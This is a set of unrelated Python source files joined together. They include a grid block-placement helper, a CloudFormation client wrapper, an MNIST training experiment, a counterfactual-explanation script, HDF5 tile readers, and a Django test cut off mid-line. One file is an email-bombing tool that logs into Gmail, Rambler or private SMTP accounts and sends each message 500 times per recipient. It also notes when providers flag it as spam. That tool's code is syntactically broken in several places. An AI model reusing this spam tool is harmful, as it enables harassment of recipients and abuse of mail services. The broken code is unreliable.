list_of_block_L_indexes.append(currentIdx-8) elif l_orietation == "RightRightDown": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx+1) currentIdx += 1 list_of_block_L_indexes.append(currentIdx+1) currentIdx += 1 list_of_block_L_indexes.append(currentIdx+8) elif l_orietation == "LeftLeftDown": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx-1) currentIdx -= 1 list_of_block_L_indexes.append(currentIdx-1) currentIdx -= 1 list_of_block_L_indexes.append(currentIdx+8) for i in list_of_block_L_indexes: if i > 63 or i < 0: block_L_not_positioned = True if block_L_not_positioned: list_of_block_L_indexes = [] positions = list_of_block_L_indexes return positions def get_random_positions_for_blocks(): allpositions = [] dic_of_positions = {} for i in get_block_L_positions(): allpositions.append(i) dic_of_positions[i] = i for j in get_block_square_positions(dic_of_positions): allpositions.append(j) dic_of_positions[j] = j for x in get_block_line_positions(dic_of_positions): allpositions.append(x) dic_of_positions[x] = x for z in get_block_line_positions(dic_of_positions): allpositions.append(z) dic_of_positions[z] = z return allpositions def get_block_line_positions(currentlyoccupiedpositions): positions = [] line_orientation_dic = [ "Up", "Down", "Left", "Right" ] block_line_not_positioned = True list_of_block_square_indexes = [] while block_line_not_positioned: block_line_not_positioned = False line_orietation = random.choice(line_orientation_dic) print(line_orietation) index_to_start = random.randrange(63) print(index_to_start) intital_block_position = index_to_start currentIdx = intital_block_position if line_orietation == "Up": list_of_block_square_indexes.append(currentIdx) list_of_block_square_indexes.append(currentIdx-8) list_of_block_square_indexes.append(currentIdx-16) list_of_block_square_indexes.append(currentIdx-24) elif line_orietation == "Down": list_of_block_square_indexes.append(currentIdx) list_of_block_square_indexes.append(currentIdx+8) list_of_block_square_indexes.append(currentIdx+16) list_of_block_square_indexes.append(currentIdx+24) elif line_orietation == 'Left': list_of_block_square_indexes.append(currentIdx) list_of_block_square_indexes.append(currentIdx-1) list_of_block_square_indexes.append(currentIdx-2) list_of_block_square_indexes.append(currentIdx-3) elif line_orietation == 'Right': list_of_block_square_indexes.append(currentIdx) list_of_block_square_indexes.append(currentIdx+1) list_of_block_square_indexes.append(currentIdx+2) list_of_block_square_indexes.append(currentIdx+3) for i in list_of_block_square_indexes: if (i > 63) or (i < 0) or (i in currentlyoccupiedpositions): block_line_not_positioned = True if block_line_not_positioned: list_of_block_square_indexes = [] positions = list_of_block_square_indexes return positions
<reponame>delfick/bespin from bespin.errors import StackDoesntExist, BadStack, Throttled from bespin.amazon.mixin import AmazonMixin from bespin import helpers as hp import botocore import boto3 import datetime import logging import pytz import time import six import os log = logging.getLogger("bespin.amazon.cloudformation") class StatusMeta(object): def __new__(cls, name, bases, attrs): attrs["name"] = name attrs["failed"] = name.endswith("FAILED") attrs["complete"] = name.endswith("COMPLETE") attrs["in_progress"] = name.endswith("IN_PROGRESS") attrs["cleanup_in_progress"] = name.endswith("CLEANUP_IN_PROGRESS") attrs["is_create"] = name.startswith("CREATE") attrs["is_delete"] = name.startswith("DELETE") attrs["is_update"] = name.startswith("UPDATE") and not name.startswith("UPDATE_ROLLBACK") attrs["is_rollback"] = name.startswith("ROLLBACK") or name.startswith("UPDATE_ROLLBACK") return type(name, bases, attrs) class Status(object): exists = True statuses = {} @classmethod def find(kls, name): if name in kls.statuses: return kls.statuses[name] return six.add_metaclass(StatusMeta)(type(name, (Status, ), {})) class NONEXISTANT(Status): exists = False class CREATE_IN_PROGRESS(Status): pass class CREATE_FAILED(Status): pass class CREATE_COMPLETE(Status): pass class ROLLBACK_IN_PROGRESS(Status): pass class ROLLBACK_FAILED(Status): pass class ROLLBACK_COMPLETE(Status): pass class DELETE_IN_PROGRESS(Status): pass class DELETE_FAILED(Status): pass class DELETE_COMPLETE(Status): pass class UPDATE_IN_PROGRESS(Status): pass class UPDATE_COMPLETE_CLEANUP_IN_PROGRESS(Status): pass class UPDATE_COMPLETE(Status): pass class UPDATE_ROLLBACK_IN_PROGRESS(Status): pass class UPDATE_ROLLBACK_FAILED(Status): pass class UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS(Status): pass class UPDATE_ROLLBACK_COMPLETE(Status): pass # REVIEW_IN_PROGRESS only valid for CreateChangeSet with ChangeSetType=CREATE class REVIEW_IN_PROGRESS(Status): pass for kls in [Status] + Status.__subclasses__(): with_meta = six.add_metaclass(StatusMeta)(kls) locals()[kls.__name__] = with_meta Status.statuses[kls.__name__] = with_meta ##BOTO3 TODO: refactor to use boto3 resources class Cloudformation(AmazonMixin): def __init__(self, stack_name, region="ap-southeast-2"): self.region = region self.stack_name = stack_name @hp.memoized_property def conn(self): log.info("Using region [%s] for cloudformation (%s)", self.region, self.stack_name) return self.session.client('cloudformation', region_name=self.region) @hp.memoized_property def session(self): return boto3.session.Session(region_name=self.region) def reset(self): self._description = None def description(self, force=False): """Get the descriptions for the stack""" if not getattr(self, "_description", None) or force: with self.catch_boto_400(StackDoesntExist, "Couldn't find stack"): while True: try: with self.ignore_throttling_error(): response = self.conn.describe_stacks(StackName=self.stack_name) self._description = response['Stacks'][0] break except Throttled: log.info("Was throttled, waiting a bit") time.sleep(0.5) return self._description @property def outputs(self): self.wait() description = self.description() if 'Outputs' in description: return dict((out['OutputKey'], out['OutputValue']) for out in description['Outputs']) else: return {} @property def status(self): force = False last_status = getattr(self, "_last_status", None) if last_status is None: self._last_status = datetime.datetime.now() force = True else: if self._last_status + datetime.timedelta(seconds=3) < datetime.datetime.now(): force = True self._last_status = None try: description = self.description(force=force) return Status.find(description['StackStatus']) except StackDoesntExist: return NONEXISTANT def map_logical_to_physical_resource_id(self, logical_id): response = self.conn.describe_stack_resource(StackName=self.stack_name, LogicalResourceId=logical_id) return response['StackResourceDetail']["PhysicalResourceId"] def tags_from_dict(self, tags): """ helper to convert python dictionary into list of AWS Tag dicts """ return [{'Key': k, 'Value': v} for k,v in tags.items()] if tags else [] def params_from_dict(self, params): """ helper to convert python dictionary into list of CloudFormation Parameter dicts """ return [{'ParameterKey': key, 'ParameterValue': value} for key, value in params.items()] if params else [] def create(self, template_body, params, tags=None, policy=None, role_arn=None, termination_protection=False): log.info("Creating stack (%s)\ttags=%s", self.stack_name, tags) stack_tags = self.tags_from_dict(tags) stack_args = { 'StackName': self.stack_name , 'TemplateBody': template_body , 'Parameters': params , 'Capabilities': ['CAPABILITY_IAM', 'CAPABILITY_NAMED_IAM'] , 'DisableRollback': os.environ.get("DISABLE_ROLLBACK", 0) == "1" , "EnableTerminationProtection": termination_protection } if stack_tags: stack_args['Tags'] = stack_tags if policy: stack_args['StackPolicyBody'] = policy if role_arn: stack_args['RoleARN'] = role_arn self.conn.create_stack(**stack_args) return True def update(self, template_body, params, tags=None, policy=None, role_arn=None, termination_protection=False): log.info("Updating stack (%s)\ttags=%s", self.stack_name, tags) stack_tags = self.tags_from_dict(tags) stack_args = { 'StackName': self.stack_name , 'TemplateBody': template_body , 'Parameters': params , 'Capabilities': ['CAPABILITY_IAM', 'CAPABILITY_NAMED_IAM'] # NOTE: DisableRollback is not supported by UpdateStack. It is a property of the stack that can only be set during stack creation } if stack_tags: stack_args['Tags'] = stack_tags if policy: stack_args['StackPolicyBody'] = policy if role_arn: stack_args['RoleARN'] = role_arn changed = False with self.catch_boto_400(BadStack, "Couldn't update the stack", stack_name=self.stack_name): try: self.conn.update_stack(**stack_args) changed = True except botocore.exceptions.ClientError as error: if error.response['Error']['Message'] == "No updates are to be performed.": log.info("No updates were necessary!") else: raise with self.catch_boto_400(BadStack, "Couldn't update termination protection", stack_name=self.stack_name): info = self.conn.describe_stacks(StackName=self.stack_name) if info["Stacks"] and "EnableTerminationProtection" in info["Stacks"][0]: current = info["Stacks"][0]["EnableTerminationProtection"] if current != termination_protection: log.info("Changing termination protection (%s)\ttermination_protection=%s", self.stack_name, termination_protection) self.conn.update_termination_protection(StackName=self.stack_name, EnableTerminationProtection=termination_protection) changed = True else: log.error("Failed to figure out if the stack currently has termination protection (%s)", self.stack_name) return changed def validate_template(self, filename): with self.catch_boto_400(BadStack, "Amazon says no", stack_name=self.stack_name, filename=filename): return self.conn.validate_template(TemplateBody=open(filename).read()) ##BOTO3 TODO: can this be refactored with client.get_waiter? ##BOTO3 TODO: also consider client.get_paginator('describe_stack_events') def wait(self, timeout=1200, rollback_is_failure=False, may_not_exist=True): status = self.status if not status.exists and may_not_exist: return status last = datetime.datetime.now(pytz.utc) if status.failed: raise BadStack("Stack is in a failed state, it must be deleted first", name=self.stack_name, status=status) for _ in hp.until(timeout, step=15): if status.exists and status.complete: break log.info("Waiting for %s - %s", self.stack_name, status.name) if status.exists and not status.complete: status = self.status else: break description = self.description() events = [] while True: try: with self.ignore_throttling_error(): response = self.conn.describe_stack_events(StackName=self.stack_name) events = response['StackEvents'] break except Throttled: log.info("Was throttled, waiting a bit") time.sleep(1) next_last = events[0]['Timestamp'] for event in events: if event['Timestamp'] > last: reason = event.get('ResourceStatusReason', '') log.info("%s - %s %s (%s) %s", self.stack_name, event['ResourceType'], event['LogicalResourceId'], event['ResourceStatus'], reason) last = next_last status = self.status if status.failed or (rollback_is_failure and status.is_rollback) or not status.complete: raise BadStack("Stack failed to complete", final_status=status) return status
<reponame>Luapulu/How-To-Document-Data-Science-Projects def experiment_03(): """ **Model and Set-up** An educational and detailed tutorial addressing the training of a machine learning model to solve the MNIST classification Model can be found `here`_. For the simple one-layer neural network, we achived best results with a learning rate of 0.01, however, to reach better convergence we use 3000 steps. .. _here: https://www.oreilly.com/learning/not-another-mnist-tutorial-with-tensorflow In this experiment, we use TensorFlow Version 1.13.1 **Model** * linear classifier (1-layer NN) **Parameter** * image_size = 28 x 28 * labels_size = 10 * learning_rate = 0.01 * **steps_number = 3000** * batch_size = 200 **Optimiser:** * tf.train.GradientDescentOptimizer **Results** Comment: Very slow convergence, because of the low learning rate * Step 200, training accuracy 85.50, training loss 0.58 * Step 400, training accuracy 90.50, training loss 0.42 * Step 600, training accuracy 92.50, training loss 0.35 * Step 800, training accuracy 93.50, training loss 0.30 * Step 1000, training accuracy 95.00, training loss 0.26 * Step 1200, training accuracy 95.00, training loss 0.24 * Step 1400, training accuracy 95.50, training loss 0.22 * Step 1600, training accuracy 96.50, training loss 0.20 * Step 1800, training accuracy 96.50, training loss 0.18 * Step 2000, training accuracy 97.50, training loss 0.17 * Step 2200, training accuracy 97.50, training loss 0.16 * Step 2400, training accuracy 98.00, training loss 0.15 * Step 2600, training accuracy 98.00, training loss 0.14 * Step 2800, training accuracy 98.50, training loss 0.13 * Step 3000, training accuracy 98.50, training loss 0.12 Test accuracy: 86.46 % Validation accuracy: 88.9 % """ import example_mnist.get_mnist_data as em import tensorflow as tf import numpy as np import os # # Fix for MacOS openMP setup. # For details see: https://github.com/dmlc/xgboost/issues/1715 os.environ['KMP_DUPLICATE_LIB_OK'] = 'True' #----------------------------------------------------------------------------# # Get Dataset #----------------------------------------------------------------------------# data = em.load() #----------------------------------------------------------------------------# # Define Model #----------------------------------------------------------------------------# image_size = data['image_size'] labels_size = data['labels_size'] learning_rate = 0.01 steps_number = 3000 batch_size = 200 print("Using TensorFlow", tf.__version__) # Define placeholders training_data = tf.placeholder(tf.float32, [None, image_size]) labels = tf.placeholder(tf.float32, [None, labels_size]) # Model parameters: W and b W = tf.get_variable("W", shape=(image_size, labels_size), dtype=tf.float32, trainable=True) b = tf.get_variable("b", shape=(labels_size,), dtype=tf.float32) # Compute predictions output = tf.matmul(training_data, W) + b # Define the loss function loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=output)) # Training step train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss) # Accuracy calculation correct_prediction = tf.equal(tf.argmax(output, 1), tf.argmax(labels, 1)) accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) # Run the training sess = tf.Session() sess.run(tf.global_variables_initializer()) # An epoch is finished when we have looked at all training samples for epoch in range(steps_number): batch_losses = [] # Get the next batch for batch_start in range(0, image_size, batch_size): input_batch = data['x_train'][batch_start:batch_start + batch_size] labels_batch = data['y_train'][batch_start:batch_start + batch_size] feed_dict = {training_data: input_batch, labels: labels_batch} _, batch_loss = sess.run([train_step, loss], feed_dict) # collect batch losses batch_losses.append(batch_loss) train_loss = np.mean(batch_losses) # ----------------------------------------------------------------------------# # Output Results # ----------------------------------------------------------------------------# # Print the accuracy progress on the batch every 100 steps if (epoch+1)%200 == 0: train_accuracy = accuracy.eval(feed_dict=feed_dict, session=sess) print("Step %i, training accuracy %.2f, training loss %.2f"%(epoch+1, train_accuracy*100, train_loss)) # Evaluate on the test set test_accuracy = accuracy.eval(feed_dict={training_data: data['x_test'], labels: data['y_test']}, session = sess) print() print("Test accuracy: %g %%"%(test_accuracy*100)) # Evaluate on the validation set validation_accuracy = accuracy.eval(feed_dict={training_data: data['x_validation'], labels: data['y_validation']}, session = sess) print("Validation accuracy: %g %%"%(validation_accuracy*100)) if __name__ == "__main__": experiment_03()
################################################################################################ # # # # This code is FREE to use and change at any moment, this code has no CopyRights and # # anything like that, the only thing that i ask you is to report any erros on my github # # https://github.com/Washiii/beans/issues/new if you donn't wanna report it on the # # surface web you can send me a email on <EMAIL> talking about the # # error (and do note use my on tool against me xD). Enjoy the code :) # # # # ################################################################################################ import smtplib, ssl import sys from random import randint from time import sleep from Tools.Email_Spam_Tool.msg_create import msg_create def create_private_server_connection(host, port) ########################################################################## # # # Create a connection with a private server (if the user wants to) # # Any error on this part is handled and logged. So if you have any # # problems please submit a issue. (or try to fix for yourself and # # contribute) # # # ########################################################################## global s_conneciton try: print("Creating the connection with the private server.") s_conneciton = smtplib.SMTP(host=host, port=port) if s_conneciton: print("Connection with private server done") else: print("An error on SMTP connection with the private server. Quiting.") sys.exit(0) except Exception as error: print("An error on SMTP connection with the private server. Quiting.") sys.exit(error) def create_preset_server_connection() global s_rambler global s_gmail #Creates the gmail SMTP server connection try: print("Creating the SMTP gmail connection") s_gmail = smtplib.SMTP(host='smtp.gmail.com', port=587) if s_gmail: print('Conection with gmail done!!\n') else: print("An error on SMTP connection with the gmail server. Quiting.") sys.exit(0) except Exception as e: print("Error on SMTP connection (gmail)") sys.exit(e) #Creates the rambler SMTP server connection try: print("Creating the SMTP rambler connection") s_rambler = smtplib.SMTP(host='smtp.rambler.ru', port=587) if s_rambler: print('Conection in rambler done!!\n') else: print("An error on SMTP connection with the rambler server. Quiting.") sys.exit(0) except Exception as e: print("Error on SMTP connection (rambler): {}".format(e)) sys.exit(0) #Yahoo removed. return True def login(server, email, password): ########################################################################### # # # Try to log in on the gmail, rambler and private server (if exist).# # Any error on this part is handled and logged. So if you have any # # problems please submit a issue. (or try to fix for yourself and # # contribute) # # # ########################################################################### if server == "gmail": if email_fail[email]: print("This email fail on the last log in, skiping it.") else: try: sleep(wait) s_gmail.connect(host='smtp.gmail.com', port=587) s_gmail.ehlo() s_gmail.starttls() s_gmail.ehlo() s_gmail.login(email, password) print("Login succefful in {}".format(email)) except Exception as e: print("Fail on login in {}. Error: {}".format(email, e)) email_fail.append(email) pass elif server == "rambler": if email_fail[email]: print("This email fail on the last log in, skiping it.") else: try: s_rambler.connect(host='smtp.rambler.ru', port=587) s_rambler.ehlo() s_rambler.starttls() s_rambler.ehlo() s_rambler.login(email, password) print("Login succefful in {}".format(email)) except Exception as e: print("Fail on login in {} because {}".format(email, e)) email_fail.append(email) pass elif sever == "private": if email_fail[email]: print("This email fail on the last log in, skiping it.") else: #You maybe need to change this lines according to your server specs try: s_conneciton.connect(host = private_host, port = private_port) s_conneciton.ehlo() #You can comment this and the bottom 2 lines if your server do not use tls encryption s_conneciton.starttls() s_conneciton.ehlo() if private_need_login == True: s_conneciton.login(email, password) print("Login succefful in {}".format(email)) except Exception as e: print("Fail on login in {} because {}".format(email, e)) email_fail.append(email) pass #Yahoo removed else: print("An internal error on the code happened. At the 'login' function, please report this issue on the github (https://github.com/Washiii/beans/issues/new)") return True def send_email(email_from = email, email_to, service): text = msg_create(email_from, email_to, body, load_image, image_names, subject) if service == "gmail": try: for attempt in range(0, 500): s_gmail.sendmail(email_from, email_to, text) #Try to send the email (500 per email) except Exception as e: error = str(e)tolower() if error.find('spam') >= 0: print("Unable to send email from '{}'. Spam detected from Gmail server.".format(email_from)) pass else: print(e) elif service == "rambler": try: for attempt in range(0, 500): s_rambler.sendmail(email_from, email_to, text) #Try to send the email (500 per email) except Exception as e: error = str(e).tolower() if error.find('spam') >= 0: print("Unable to send email from '{}'. Spam detected from Rambler server.".format(email_from)) pass else: print(e) elif service == "private": try: for attempt in range (0, private_max_trys): s_conneciton.sendmail(email_from, email_to, text) except Exception as e: error str(e)tolower() if error.find('spam') >= 0: print("Unable to send email from '{}'. Spam detected from Private server.".format(email_from)) else: print("An internal error on the code happened. At the 'send_email' function, please report this issue on the github (https://github.com/Washiii/beans/issues/new)") #TODO: verify emails domain; #get_contacts function (both to and from) #the "questions" parts to define variables like 'load_images' 'subject' and etc #main function
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys import numpy as np import cvxpy as cp import matplotlib.pyplot as plt import seaborn as sns from sklearn.covariance import GraphicalLasso, GraphicalLassoCV from sklearn.linear_model import LogisticRegression from sklearn.model_selection import train_test_split from sklearn.model_selection import KFold from sklearn.metrics import f1_score from sklearn.preprocessing import StandardScaler from sklearn.decomposition import MiniBatchDictionaryLearning from sklearn_lvq import GlvqModel import random np.random.seed(42) random.seed(42) from ceml.sklearn import generate_counterfactual from utils import covariance_to_correlation, load_data_iris, load_data_breast_cancer, load_data_wine, load_data_digits, get_delta_overlap from models_mp import SeparatingHyperplane, GMLVQ n_kfold_splits = 3 if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: <dataset_desc> <model_desc>") else: dataset_desc = sys.argv[1] model_desc = sys.argv[2] n_components = None if dataset_desc == "iris": X, y = load_data_iris() elif dataset_desc == "breastcancer": X, y = load_data_breast_cancer() elif dataset_desc == "wine": X, y = load_data_wine() elif dataset_desc == "digits": X, y = load_data_digits() labels = np.unique(y) n_dict_components = 10 print(labels) print(f"Dimensionality: {X.shape[1]}") # Results: n_wrong_classification = 0 n_not_found = 0 corr_matrices = [] original_samples = [] counterfactuals = [] counterfactuals_labels = [] causal_counterfactuals = [] counterfactual_causal_dist = [] deltas = [] causal_deltas = [] deltas_overlap = [] # k-fold cross validation kf = KFold(n_splits=n_kfold_splits, shuffle=True) for train_indices, test_indices in kf.split(X): X_train, X_test, y_train, y_test = X[train_indices, :], X[test_indices], y[train_indices], y[test_indices] print(f"Train size: {X_train.shape}\nTest size: {X_test.shape}") # Dcitionary learning - smth. like "sparse coding" print("Learning dictionary") dict_learner = MiniBatchDictionaryLearning(n_components=n_dict_components, transform_algorithm='omp',n_jobs=-1, alpha=10., n_iter=1000) dict_learner.fit(X_train) X_train_coeff, X_test_coeff = dict_learner.transform(X_train), dict_learner.transform(X_test) dict_mat = dict_learner.components_ X_train, X_test = dict_learner.transform(X_train) @ dict_learner.components_, dict_learner.transform(X_test) @ dict_learner.components_ print("Dictinary learned") # Preprocessing scaler = StandardScaler() X_train = scaler.fit_transform(X_train);X_test = scaler.transform(X_test);print("StandardScaler is applied to data.") # Fit and evaluate model model = None if model_desc == "logreg": model = LogisticRegression(multi_class='multinomial') elif model_desc == "glvq": model = GlvqModel(prototypes_per_class=3, max_iter=1000) cov = GraphicalLasso(alpha=.8).fit(X_train).covariance_ # Compute and turn covariance into correlation matrix ##cov = GraphicalLassoCV().fit(X_train).covariance_ # Compute and turn covariance into correlation matrix corr = covariance_to_correlation(cov) #corr = np.identity(X_train.shape[1]) corr_matrices.append(corr) model.fit(X_train, y_train) y_pred = model.predict(X_test) print(f"F1-score: {f1_score(y_test, y_pred, average='weighted')}") print() # Compute counterfactual explanations of all test samples cf = None if model_desc == "logreg": cf = SeparatingHyperplane(model.coef_, model.intercept_, epsilon=1e-5) # Object for computing causal counterfactuals elif model_desc == "gmlvq" or model_desc == "glvq": cf = GMLVQ(model, epsilon=1e-2) n_test = X_test.shape[0] for i in range(n_test): # Get current data point, its ground truth label and compute a random target label x_orig, y_orig = X_test[i,:],y_test[i] if model.predict([x_orig]) != y_orig: n_wrong_classification += 1 continue y_target = random.choice(list(filter(lambda l: l != y_orig, labels))) I = np.identity(x_orig.shape[0]) # Compute counterfactuals with and without causality constraint try: opt = "mp" regularizer="l1" # L2 -> All features are changed, L1 -> Only very few features are changed (huge different for causal vs. non-causal counterfactual) # Without causality constraint opt_args = {"epsilon": 1.e-2, "solver": cp.MOSEK, "solver_verbosity": True, "max_iter": 100} x_cf, delta = cf.compute_counterfactual(x_orig, y_target, corr=I, regularizer=regularizer)#, optimizer_args=opt_args) if x_cf is None: print("Computation of counterfactual failed!", y_target) n_not_found += 1 continue if model.predict([x_cf]) != y_target: print("Wrong prediction on counterfactual") continue delta_cf = x_cf - x_orig # With causality constraint x_orig_prime = X_test_coeff[i,:] @ dict_mat # Sparse coding via learned dictionary corr_prime = dict_mat.T @ dict_mat_corr x_cf2, delta2 = cf.compute_counterfactual(x_orig_prime, y_target, corr=corr_prime, regularizer=regularizer) if x_cf2 is None: print("Computation of causal counterfactual failed!") n_not_found += 1 continue if model.predict([x_cf2]) != y_target: print("Wrong prediction on counterfactual") #n_wrong_classification += 1 continue delta_cf2 = x_cf2 - x_orig # Evaluate closeness, number of non-zero changes, etc. original_samples.append(x_orig) counterfactuals_labels.append(y_target) counterfactuals.append(x_cf) causal_counterfactuals.append(x_cf2) counterfactual_causal_dist.append(np.linalg.norm(x_cf - x_cf2, 1)) delta = np.round(delta, decimals=5) # Avoid very small number like 10^-10 which are likely a numerical artefact from optimization delta2 = np.round(delta2, decimals=5) except Exception as ex: print(ex, y_target) n_not_found += 1 # Compute final evaluation print("Final evaluation") print(f"Dim: {X.shape[1]}") print(f"Not found: {n_not_found}") print(f"Wong classification: {n_wrong_classification}") # Compute some statistics for each metric print(f"=>Difference:\nMean: {np.mean(counterfactual_causal_dist)}\nMedian: {np.median(counterfactual_causal_dist)}\nVar: {np.var(counterfactual_causal_dist)}\nStd: {np.std(counterfactual_causal_dist)}") print(f"=>Overlap:\nMean: {np.mean(deltas_overlap)}\nMedian: {np.median(deltas_overlap)}\nVar: {np.var(deltas_overlap)}\nStd: {np.std(deltas_overlap)}")
import clodius.array as ct import math import numpy as np def get_tileset_info(hdf_file): """ Get information about the tileset. :param hdf_file: A file handle for an HDF5 file (h5py.File('...')) """ d = hdf_file["meta"] if "min-pos" in d.attrs: min_pos = d.attrs["min-pos"] else: min_pos = 0 if "max-pos" in d.attrs: max_pos = d.attrs["max-pos"] else: max_pos = d.attrs["max-length"] return { "max_pos": max_pos, "min_pos": min_pos, "max_width": d.attrs["max-width"], "max_zoom": d.attrs["max-zoom"], "tile_size": d.attrs["tile-size"], } def bisect_left(a, x, lo=0, hi=None, comparator=None): """Bisect_left with with an additional comparator. Based on the bisect_left function from the python bisect module. Return the index where to insert item x in list a, assuming a is sorted. The return value i is such that all e in a[:i] have e < x, and all e in a[i:] have e >= x. So if x already appears in the list, a.insert(x) will insert just before the leftmost x already there. Optional args lo (default 0) and hi (default len(a)) bound the slice of a to be searched. Args: a (array): The array to bisect x (object): The object to find the insertion point of lo (int): The starting index of items to search in a hi (int): The end index of items to search in a comparator (function(a,b)): A way to compare objects """ if lo < 0: raise ValueError("lo must be non-negative") if hi is None: hi = len(a) while lo < hi: mid = (lo + hi) // 2 if comparator(a[mid], x) < 0: lo = mid + 1 else: hi = mid return lo def bisect_right(a, x, lo=0, hi=None, comparator=None): """Bisect_right with with an additional comparator. Based on the bisect_right function from the python bisect module. Return the index where to insert item x in list a, assuming a is sorted. The return value i is such that all e in a[:i] have e <= x, and all e in a[i:] have e > x. So if x already appears in the list, a.insert(x) will insert just after the rightmost x already there. Optional args lo (default 0) and hi (default len(a)) bound the slice of a to be searched. Args: a (array): The array to bisect x (object): The object to find the insertion point of lo (int): The starting index of items to search in a hi (int): The end index of items to search in a comparator (function(a,b)): A way to compare objects """ if lo < 0: raise ValueError("lo must be non-negative") if hi is None: hi = len(a) while lo < hi: mid = (lo + hi) // 2 if comparator(x, a[mid]) < 0: hi = mid else: lo = mid + 1 return lo def get_discrete_data(hdf_file, z, x): """ Get a discrete set of data from an hdf_tile file. Args: hdf_file (h5py.File): File handle for the file containing the information z (int): The zoom level of this tile x (int): The x position of this tile Returns: A 2D array of entries at that position. It is assumed that names of the columns are known. """ # is the title within the range of possible tiles if x > 2 ** z: print("OUT OF RIGHT RANGE") return [] if x < 0: print("OUT OF LEFT RANGE") return [] d = hdf_file["meta"] tile_size = int(d.attrs["tile-size"]) # max_length = int(d.attrs['max-length']) max_zoom = int(d.attrs["max-zoom"]) # max_width = tile_size * 2 ** max_zoom # f is an array of data (e.g. [['34','53', 'x'],['48','57', 'y']] ) # where the first two columns indicate the start and end points f = hdf_file[str(z)] # the tile width depends on the zoom level, lower zoom tiles encompass # a broader swatch of the data tile_width = tile_size * 2 ** (max_zoom - z) tile_start = x * tile_width tile_end = tile_start + tile_width # We need a way to compare data points that aren't numbers # (e.g. the arrays that are in f) def comparator_start(a, b): return int(a[0]) - int(b[0]) def comparator_end(a, b): return int(a[1]) - int(b[1]) tile_data_start = bisect_left(f, [tile_start], comparator=comparator_start) tile_data_end = bisect_right(f, [tile_end], comparator=comparator_start) return f[tile_data_start:tile_data_end] def get_data(hdf_file, z, x): """ Return a tile from an hdf_file. :param hdf_file: A file handle for an HDF5 file (h5py.File('...')) :param z: The zoom level :param x: The x position of the tile """ # is the title within the range of possible tiles if x > 2 ** z: print("OUT OF RIGHT RANGE") return [] if x < 0: print("OUT OF LEFT RANGE") return [] d = hdf_file["meta"] tile_size = int(d.attrs["tile-size"]) zoom_step = int(d.attrs["zoom-step"]) max_zoom = int(d.attrs["max-zoom"]) max_width = tile_size * 2 ** max_zoom if "max-position" in d.attrs: max_position = int(d.attrs["max-position"]) else: max_position = max_width rz = max_zoom - z # tile_width = max_width / 2**z # because we only store some a subsection of the zoom levels next_stored_zoom = zoom_step * math.floor(rz / zoom_step) zoom_offset = rz - next_stored_zoom # the number of entries to aggregate for each new value num_to_agg = 2 ** zoom_offset total_in_length = tile_size * num_to_agg # which positions we need to retrieve in order to dynamically aggregate start_pos = int((x * 2 ** zoom_offset * tile_size)) end_pos = int(start_pos + total_in_length) # print("max_position:", max_position) max_position = int(max_position / 2 ** next_stored_zoom) # print("new max_position:", max_position) """ print("start_pos:", start_pos) print("end_pos:", end_pos) print("next_stored_zoom", next_stored_zoom) print("max_position:", int(max_position)) """ f = hdf_file["values_" + str(int(next_stored_zoom))] if start_pos > max_position: # we want a tile that's after the last bit of data a = np.zeros(end_pos - start_pos) a.fill(np.nan) ret_array = ct.aggregate(a, int(num_to_agg)) elif start_pos < max_position and max_position < end_pos: a = f[start_pos:end_pos][:] a[max_position + 1 : end_pos] = np.nan ret_array = ct.aggregate(a, int(num_to_agg)) else: ret_array = ct.aggregate(f[start_pos:end_pos], int(num_to_agg)) """ print("ret_array:", f[start_pos:end_pos]) print('ret_array:', ret_array) """ # print('nansum', np.nansum(ret_array)) # check to see if we counted the number of NaN values in the given # interval f_nan = None if "nan_values_" + str(int(next_stored_zoom)) in hdf_file: f_nan = hdf_file["nan_values_" + str(int(next_stored_zoom))] nan_array = ct.aggregate(f_nan[start_pos:end_pos], int(num_to_agg)) num_aggregated = 2 ** (max_zoom - z) num_vals_array = np.zeros(len(nan_array)) num_vals_array.fill(num_aggregated) num_summed_array = num_vals_array - nan_array averages_array = ret_array / num_summed_array return averages_array return ret_array
import smart_imports smart_imports.all() class PostponedChangeCredentialsTaskTests(utils_testcase.TestCase): def setUp(self): super(PostponedChangeCredentialsTaskTests, self).setUp() game_logic.create_test_map() self.account = self.accounts_factory.create_account() self.task = prototypes.ChangeCredentialsTaskPrototype.create(self.account, new_email='<EMAIL>', new_password='<PASSWORD>', new_nick='test_nick', relogin_required=True) self.postponed_task = postponed_tasks.ChangeCredentials(task_id=self.task.id) def test_create(self): self.assertEqual(self.postponed_task.processed_data, {'next_url': dext_urls.url('accounts:profile:edited')}) self.assertEqual(self.postponed_task.task_id, self.task.id) self.assertTrue(self.postponed_task.state.is_UNPROCESSED) def test_serialization(self): self.assertEqual(self.postponed_task.serialize(), postponed_tasks.ChangeCredentials.deserialize(self.postponed_task.serialize()).serialize()) def test_processed_view__real(self): self.assertEqual(self.task.process(logger=mock.Mock()), None) # sent mail postponed_taks = self.task.process(logger=mock.Mock()) # create task postponed_taks.process(logger=mock.Mock()) self.check_ajax_ok(self.client.get(dext_urls.url('postponed-tasks:status', postponed_taks.id))) self.assertNotIn('_auth_user_id', self.client.session) def test_processed_view__logout__same_user(self): self.request_login(self.account.email) self.assertEqual(self.task.process(logger=mock.Mock()), None) # sent mail postponed_taks = self.task.process(logger=mock.Mock()) # create task postponed_taks.process(logger=mock.Mock()) self.check_ajax_ok(self.client.get(dext_urls.url('postponed-tasks:status', postponed_taks.id))) self.assertNotIn('_auth_user_id', self.client.session) def test_processed_view__logout__other_user(self): account_2 = self.accounts_factory.create_account() self.request_login(account_2.email) self.assertEqual(self.task.process(logger=mock.Mock()), None) # sent mail postponed_taks = self.task.process(logger=mock.Mock()) # create task postponed_taks.process(logger=mock.Mock()) self.check_ajax_ok(self.client.get(dext_urls.url('postponed-tasks:status', postponed_taks.id))) self.assertEqual(int(self.client.session.get('_auth_user_id')), account_2.id) def test_processed_view__real__without_relogin(self): self.task._model.relogin_required = False self.task._model.save() self.assertEqual(self.task.process(logger=mock.Mock()), None) # sent mail postponed_taks = self.task.process(logger=mock.Mock()) # create task postponed_taks.process(logger=mock.Mock()) self.check_ajax_ok(self.client.get(dext_urls.url('postponed-tasks:status', 